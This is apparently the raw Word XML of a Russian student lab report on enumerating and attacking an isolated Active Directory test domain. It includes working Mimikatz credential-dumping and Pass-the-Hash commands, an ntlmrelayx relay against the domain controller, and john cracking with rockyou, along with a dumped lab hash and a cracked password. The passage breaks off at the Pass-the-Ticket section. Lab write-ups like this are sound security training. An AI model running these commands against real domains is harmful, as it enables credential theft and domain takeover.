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47B91" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00A959D4">
      <w:pPr>
        <w:spacing w:after="2400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13E56ADB" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>ОТЧЁТ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63410CBA" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>по практической работе 11.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51922C1D" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>«Анализ доменной инфраструктуры и выполнение атак на Active Directory»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079F9C18" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1133F13B" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00A959D4">
      <w:pPr>
        <w:sectPr w:rsidR="00A959D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0BA13DE" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000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972514889"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="4D98DE4D" w14:textId="77777777" w:rsidR="00234811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412374" w:history="1">
            <w:r w:rsidR="00234811" w:rsidRPr="00915104">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Цели работы</w:t>
            </w:r>
            <w:r w:rsidR="00234811">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00234811">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00234811">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc239412374 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00234811">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00234811">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00234811">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00234811">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C9501B7" w14:textId="77777777" w:rsidR="00234811" w:rsidRDefault="0023481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75" w:history="1">
            <w:r w:rsidRPr="00915104">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Используемые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FD033" w14:textId="77777777" w:rsidR="00234811" w:rsidRDefault="0023481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76" w:history="1">
            <w:r w:rsidRPr="00915104">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. Тестовый стенд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932526" w14:textId="77777777" w:rsidR="00234811" w:rsidRDefault="0023481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77" w:history="1">
            <w:r w:rsidRPr="00915104">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4. Задание 1. Анализ доменной инфраструктуры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04D695" w14:textId="77777777" w:rsidR="00234811" w:rsidRDefault="0023481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78" w:history="1">
            <w:r w:rsidRPr="00915104">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5. Задание 2. Выполнение атак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A8D94F" w14:textId="77777777" w:rsidR="00234811" w:rsidRDefault="0023481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79" w:history="1">
            <w:r w:rsidRPr="00915104">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1. Атака Pass-the-Hash (Mimikatz)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A59AF9" w14:textId="77777777" w:rsidR="00234811" w:rsidRDefault="0023481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80" w:history="1">
            <w:r w:rsidRPr="00915104">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2. Атака NTLM Relay (Impacket)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36EBE4" w14:textId="77777777" w:rsidR="00234811" w:rsidRDefault="0023481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81" w:history="1">
            <w:r w:rsidRPr="00915104">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3. Атака Pass-the-Ticket (Mimikatz)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0474D4" w14:textId="77777777" w:rsidR="00234811" w:rsidRDefault="0023481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82" w:history="1">
            <w:r w:rsidRPr="00915104">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.4. Атака Kerberoasting (Impacket / Rubeus)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02AB2E" w14:textId="77777777" w:rsidR="00234811" w:rsidRDefault="0023481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412383" w:history="1">
            <w:r w:rsidRPr="00915104">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.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_Toc239412383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6DC61A" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6A55845F" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc239412374"/>
      <w:r>
        <w:t>1. Цели работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6DC421CD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получить опыт проведения анализа доменной инфраструктуры с использованием ПО BloodHound;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1851A7E4" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRPr="00234811" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>выполнить</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>атаки</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>тестовой</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>инфраструктуре</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Pass-the-Hash (Mimikatz), NTLM Relay (Impacket), Pass-the-Ticket (Mimikatz), Kerberoasting (Rubeus / Impacket).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA29765" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc239412375"/>
      <w:r>
        <w:t>2. Используемые инструменты</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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6465"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A959D4" w14:paraId="5EF3C0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</w:tcPr>
          <w:p w14:paraId="6B96AEB1" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto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6626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EB8B490" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288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959D4" w14:paraId="26513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25D29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SharpHound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E0DE684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Сбор данных об объектах Active Directory (пользователи, группы, сессии, ACL) для последующего анализа</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A959D4" w14:paraId="3DE76D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C857D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BloodHound CE + Neo4j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41DFB31E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Визуализация и анализ связей в домене, построение графов путей атаки</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A959D4" w14:paraId="5E5486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50504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Mimikatz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E25E1C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Извлечение учётных данных и билетов Kerberos из памяти LSASS; атаки Pass-the-Hash и Pass-the-Ticket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A959D4" w14:paraId="261FDD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B7228C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Impacket (ntlmrelayx, GetUserSPNs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BB55236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Ретрансляция NTLM-аутентификации; запрос сервисных билетов Kerberos (Kerberoasting)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A959D4" w14:paraId="244AF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804E8A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Rubeus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6851C6F7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Взаимодействие с Kerberos из Windows: запрос и выгрузка билетов служб (Kerberoasting)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A959D4" w14:paraId="5C376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52ADF1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John the Ripper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00E7EB38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Подбор паролей по перехваченным хешам (NetNTLMv2, krb5tgs) со словарём и правилами мутации</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55C5143F" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc239412376"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Тестовый стенд</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="04A6A19D" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Работа выполняется в изолированной тестовой инфраструктуре домена acme.skb. Подключение к стенду осуществляется по VPN (WireGuard), доступ к виртуальным машинам — по протоколу RDP.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4926"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A959D4" w14:paraId="1A4FA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</w:tcPr>
          <w:p w14:paraId="0792A6A8" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Машина</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20102B5D" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>IP-адрес</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4926" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="275C4855" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto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A959D4" w:rsidRPr="00234811" w14:paraId="03568C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D748B9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kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B1D3F54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10.0.30.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4926" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C13815D" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRPr="00234811" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00234811">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>машина</w:t>
            </w:r>
            <w:r w:rsidRPr="0023481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атакующего</w:t>
            </w:r>
            <w:r w:rsidRPr="00234811">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (BloodHound, Impacket, John the Ripper)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A959D4" w14:paraId="4B3644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2A550710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ws01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AFCBAC5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10.0.30.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4926" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C95D5C1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Windows — рабочая станция домена (учётная запись ACME\student)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A959D4" w14:paraId="260AB2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BE23DF2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dc01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="316F77AF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10.0.20.51</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4926" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C4F3756" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="288" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows Server — контроллер домена acme.skb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="035BF9C8" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc239412377"/>
      <w:r>
        <w:t>4. Задание 1. Анализ доменной инфраструктуры</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="7A8A1537" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>На рабочей станции ws01 запущен коллектор SharpHound, который собирает информацию об объектах домена (пользователи, группы, компьютеры, сессии, права) через LDAP и API Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5CDB97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.\SharpHound.exe -c All -d acme.skb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B60E607" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Сбор завершён успешно: обработан 104 объекта домена, результаты сохранены в ZIP-архив («SharpHound Enumeration Completed... Happy Graphing!»).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6580E4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7D3555" wp14:editId="6373CFC6">
            <wp:extent cx="5715000" cy="2600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AFD3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1 — Успешное завершение сбора данных коллектором SharpHound на ws01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727C1B60" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>На машине kali запущены база данных Neo4j и BloodHound Community Edition (команда bloodhound-start, веб-интерфейс http://127.0.0.1:8080, учётные данные по умолчанию admin/admin). ZIP-архив коллектора загружен в BloodHound, после чего построен граф, отображающий всех пользователей группы «Администраторы домена» (Domain Admins).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E33171B" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>По графу видно, что членами группы являются: ALICE@ACME.SKB, ITSUPPORT@ACME.SKB, АДМИНИСТРАТОР@ACME.SKB и STUDENT@ACME.SKB. Это означает, что компрометация любой из этих учётных записей даёт атакующему контроль над доменом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290A2992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F6CD39" wp14:editId="532BEBEE">
            <wp:extent cx="5715000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99D0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2 — Граф членов группы «Администраторы домена» в BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBE76E2" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc239412378"/>
      <w:r>
        <w:t>5. Задание 2. Выполнение атак</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="3EE3B064" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc239412379"/>
      <w:r>
        <w:t>5.1. Атака Pass-the-Hash (Mimikatz)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="3FF2C292" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Суть атаки: при входе пользователя Windows хранит в памяти процесса LSASS производные от пароля данные, в том числе NTLM-хеш. Протокол NTLM при аутентификации использует именно хеш, а не сам </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>пароль, поэтому знания хеша достаточно, чтобы выдать себя за пользователя, — пароль подбирать не нужно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1F3780" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>На ws01 запущен Mimikatz из командной строки с правами администратора. Команда privilege::debug включает отладочные привилегии, после чего sekurlsa::logonpasswords считывает учётные данные из памяти LSASS. Для пользователя student получен NTLM-хеш:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA108E2" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NTLM : 1f65fcf0ce91f6f9021320e383bb6cd1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDEA8B4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706FCC6" wp14:editId="421C26AD">
            <wp:extent cx="5715000" cy="2762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318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3 — NT-хеш пользователя student в выводе Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B27361" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Далее выполняется собственно атака Pass-the-Hash: Mimikatz подставляет извлечённый хеш в новый logon-сеанс и запускает из него командную строку:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50012AE7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sekurlsa::pth /user:student /domain:acme.skb /ntlm:1f65fcf0ce91f6f9021320e383bb6cd1 /run:cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D7B184" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Из открывшейся командной строки выполнена проверка доступа к административному ресурсу контроллера домена: dir \\dc01\c$ — содержимое диска C: контроллера домена dc01 отображено. Доступ получен без знания пароля, только по NTLM-хешу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C1E761" w14:textId="77777777" w:rsidR="00A959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048028" wp14:editId="40B5590B">
            <wp:extent cx="5715000" cy="3181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039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4 — Успешный Pass-the-Hash: доступ к \\dc01\c$ по NTLM-хешу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9EF615" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc239412380"/>
      <w:r>
        <w:t>5.2. Атака NTLM Relay (Impacket)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="1353797F" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Суть атаки: атакующий встаёт «посередине» — принимает NTLM-аутентификацию жертвы и ретранслирует её на целевой сервер, который не может отличить ретрансляцию от легитимного входа. Атака возможна, когда на сервере не требуется подписывание SMB-пакетов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0468A5E7" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>На машине kali запущен скрипт ntlmrelayx из состава Impacket с целью — контроллером домена:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB13B33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impacket-ntlmrelayx -t smb://10.0.20.51 -smb2support -of hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5338FAC7" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>С рабочей станции ws01 выполнена попытка обращения к сетевой папке машины kali. Скрипт перехватил аутентификацию ACME/STUDENT с адреса 10.0.30.11 и успешно ретранслировал её на dc01 — в журнале зафиксировано «Authenticating connection from ACME/STUDENT@10.0.30.11 against smb://10.0.20.51 SUCCEED». Перехваченный NetNTLMv2-хеш сохранён в файл hashes_ntlmv2.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF989AC" w14:textId="77777777" w:rsidR="00A959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25E506" wp14:editId="30CFCB7B">
            <wp:extent cx="4476750" cy="411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5C1C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5 — ntlmrelayx: успешная ретрансляция аутентификации на dc01 (SUCCEED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9162BB" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Перехваченный хеш NetNTLMv2 непригоден для Pass-the-Hash, но поддаётся офлайн-подбору пароля. Подбор выполнен в John the Ripper по словарю rockyou с набором правил мутации (leet-замены символов):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4685817D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john --wordlist=/usr/share/wordlists/rockyou.txt --rules=leet ~/hashes_ntlmv2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC58549" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Пароль пользователя student успешно подобран: $tudent0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5696F212" w14:textId="77777777" w:rsidR="00A959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BDFF48" wp14:editId="49F73F94">
            <wp:extent cx="5715000" cy="2886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9159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6 — John the Ripper: пароль $tudent0 подобран из NetNTLMv2-хеша</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC20A5A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D4EE31D" wp14:editId="466B9AEA">
            <wp:extent cx="5715000" cy="2790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04D2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7 — Подтверждение: 1 хеш взломан, 0 осталось (john --show)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1309DC3C" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRPr="00234811" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc239412381"/>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3. </w:t>
      </w:r>
      <w:r>
        <w:t>Атака</w:t>
      </w:r>
      <w:r w:rsidRPr="00234811">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pass-the-Ticket (Mimikatz)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="7C52AB81" w14:textId="77777777" w:rsidR="00A959D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
